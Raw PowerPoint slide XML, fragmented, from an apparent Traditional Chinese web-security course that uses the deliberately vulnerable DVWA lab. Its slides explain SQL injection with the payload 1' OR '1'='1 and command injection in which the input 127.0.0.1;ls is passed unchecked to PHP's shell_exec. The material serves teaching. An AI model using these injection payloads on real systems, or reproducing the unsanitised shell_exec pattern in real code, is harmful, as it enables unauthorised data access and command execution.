        <p:spPr>
          <a:xfrm rot="2041518">
            <a:off x="5992940" y="2824336"/>
            <a:ext cx="98438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9" name="矩形 1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6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F8B98A2-5D3B-4E35-ACD6-0959FD1632B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184189" y="3318086"/>
            <a:ext cx="70146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5633DC5-6708-4E52-B8CC-73118A87F099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520292" y="2186257"/>
            <a:ext cx="28600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0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latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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 OR 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=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 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520AE92B-3539-4EE9-A072-B8EA831821AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2041518">
            <a:off x="5992940" y="2824336"/>
            <a:ext cx="98438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153F599-5386-42F2-AA68-6E7D99E2A398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184189" y="3908322"/>
            <a:ext cx="77930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en-US" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>1' OR '1'= '1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04780C5D-B239-40AA-9975-980A576EB545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6879653" y="3563213"/>
            <a:ext cx="27221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9" name="矩形 1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88865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SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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F8B98A2-5D3B-4E35-ACD6-0959FD1632B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184189" y="3318086"/>
            <a:ext cx="70146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5633DC5-6708-4E52-B8CC-73118A87F099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520292" y="2186257"/>
            <a:ext cx="28600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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$id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latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="30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 OR 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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>1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xmlns="" id="{520AE92B-3539-4EE9-A072-B8EA831821AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2041518">
            <a:off x="5992940" y="2824336"/>
            <a:ext cx="98438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153F599-5386-42F2-AA68-6E7D99E2A398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184189" y="3908322"/>
            <a:ext cx="77930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first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>1' OR '1'= '1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DD09573-7A42-4D21-9FE1-265F15F34642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4642855" y="4372779"/>
            <a:ext cx="422743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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 或是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=1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OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只要一個成立結果就會等於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TRUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所以不管前面是多少後面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一定成立。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04780C5D-B239-40AA-9975-980A576EB545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6879653" y="3563213"/>
            <a:ext cx="27221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4439C2B-9E5E-4C6F-A8F5-057D468FD325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615581" y="4672056"/>
            <a:ext cx="396454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250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>1' OR '1'= '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>';"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="225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9" name="矩形 1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5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7540" y="2991756"/>
            <a:ext cx="5568922" cy="557263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29466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20A8F6A-F285-4765-A157-0304F6C7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2911078"/>
            <a:ext cx="4314825" cy="10358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9" name="矩形 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3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4" y="1488817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正常輸入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21ADF4F7-3621-409D-B74B-36D1B9C4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75" y="2864559"/>
            <a:ext cx="4786313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F9577C7-7348-4A64-85D0-5431C5662B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264522" y="2889726"/>
            <a:ext cx="1795684" cy="600164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TW" altLang="en-US" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1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1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479"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模組</a:t>
            </a:r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4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3" y="1488817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63524CF-316C-4A14-BE52-8DDEA768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0" y="2482989"/>
            <a:ext cx="2820209" cy="283858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344058" y="5120234"/>
            <a:ext cx="726061" cy="176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891708" y="4327076"/>
            <a:ext cx="899035" cy="702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8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100370" y="1476723"/>
            <a:ext cx="63257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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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4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'ip'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Determine OS and execute the ping command.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stristr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php_uname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),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'Windows NT'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Windows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*nix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76558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0800000">
            <a:off x="3610906" y="2470895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4254445" y="2470895"/>
            <a:ext cx="172354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使用者輸入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9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100370" y="1476723"/>
            <a:ext cx="63257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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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4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'ip'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Determine OS and execute the ping command.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stristr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php_uname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),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'Windows NT'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Windows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*nix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76558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0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0800000">
            <a:off x="4622333" y="3096889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5441716" y="2819890"/>
            <a:ext cx="3084755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檢查環境是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>還是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令不相同</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50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100370" y="1476723"/>
            <a:ext cx="63257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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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4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'Submit'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  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$_REQUEST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'ip'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Determine OS and execute the ping command.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stristr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php_uname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's'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),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'Windows NT'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 )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Windows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*nix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// Feedback for the end user </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="14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"&lt;pre&gt;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$cmd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1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>&lt;/pre&gt;"</a:t>
            </a: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4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4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76558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6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0800000">
            <a:off x="4544820" y="4387962"/>
            <a:ext cx="542945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A56A3C62-E20A-401F-9146-D94272124DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172708" y="4457213"/>
            <a:ext cx="3879707" cy="3231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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>發現沒有對輸入做任何檢查直接做命令執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="箭號: 向右 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5635A446-D774-48E7-B629-999A87D4A4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4459877" y="3540706"/>
            <a:ext cx="542945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48CDCD03-6FCC-4745-871D-EBB2AAB3FCDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087765" y="3609957"/>
            <a:ext cx="3879707" cy="3231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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>發現沒有對輸入做任何檢查直接做命令執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9729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4" y="1488817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40E8162-DCCD-417F-B28C-582F7282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70" y="2553759"/>
            <a:ext cx="480060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1031459-E421-49D5-9225-9E494661F2E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297192" y="2574397"/>
            <a:ext cx="2172390" cy="600164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zh-TW" altLang="en-US" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="33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B850F99-8617-494C-B208-FDB1E5185239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2321170" y="4260850"/>
            <a:ext cx="728133" cy="4656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xmlns="" id="{89A0608B-0115-476A-B41E-9A15BDA1A80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299811" y="4031239"/>
            <a:ext cx="793238" cy="92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6" name="群組 15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7" name="矩形 16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4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580D41-8715-4FF2-87ED-D49DA41BAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197026" y="2392290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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$target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2400" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls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7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580D41-8715-4FF2-87ED-D49DA41BAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197026" y="2392290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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$target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2400" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400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14CA4AA-CBC6-455E-85C0-AABC8C0BE68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966599" y="3376603"/>
            <a:ext cx="4605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); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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xmlns="" id="{8043E806-23D7-4E17-9C07-E7CC208F7F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3365303">
            <a:off x="5468333" y="2979969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1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580D41-8715-4FF2-87ED-D49DA41BAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197026" y="2392290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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$target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2400" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400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14CA4AA-CBC6-455E-85C0-AABC8C0BE68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966599" y="3376603"/>
            <a:ext cx="4605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); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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D955B7E-92B2-4E3B-96E3-58798BC3B4FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966599" y="4041415"/>
            <a:ext cx="50930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zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ls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); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100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1F8F4AB1-587E-4D17-B58F-5956991209A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3365303">
            <a:off x="5832403" y="3744998"/>
            <a:ext cx="391686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箭號: 向右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8043E806-23D7-4E17-9C07-E7CC208F7F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3365303">
            <a:off x="5468333" y="2979969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6" name="矩形 15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9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580D41-8715-4FF2-87ED-D49DA41BAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197026" y="2392290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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$target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sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400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127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls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DA9C1AF-5BCE-4306-9AF8-FF90FD0747D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4868143" y="505921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197471B-CE86-49A5-850D-303415A7497D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651843" y="4851465"/>
            <a:ext cx="29674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DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ping -c 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ls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9105976A-ED02-4BCB-A47C-836EB25D7E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089702" y="4706227"/>
            <a:ext cx="3722494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100" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>可以一行執行多個指令，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;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|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2100" dirty="0"/>
              <a:t>等等符號隔開</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2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14CA4AA-CBC6-455E-85C0-AABC8C0BE68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966599" y="3376603"/>
            <a:ext cx="46057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$target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); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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D955B7E-92B2-4E3B-96E3-58798BC3B4FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966599" y="4041415"/>
            <a:ext cx="50930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$cmd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shell_exec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'ping  -c 4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zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ls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); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="箭號: 向右 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1F8F4AB1-587E-4D17-B58F-5956991209A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3365303">
            <a:off x="5832403" y="3744998"/>
            <a:ext cx="391686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箭號: 向右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8043E806-23D7-4E17-9C07-E7CC208F7F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3365303">
            <a:off x="5468333" y="2979969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4" name="群組 23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25" name="矩形 2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9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698" y="2991756"/>
            <a:ext cx="6712606" cy="557263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Reflected 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2017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766617" cy="925792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>學習地圖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125" y="5219130"/>
            <a:ext cx="7800042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網站運作原理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367" y="3995901"/>
            <a:ext cx="264687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</a:rPr>
              <a:t>網站漏洞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0707" y="2812026"/>
            <a:ext cx="2822247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WEB-CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>實戰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0330" y="2304194"/>
            <a:ext cx="5040726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</a:rPr>
              <a:t>網站安全防護</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="48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7584" y="4119012"/>
            <a:ext cx="1362617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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網站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</a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>實測</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
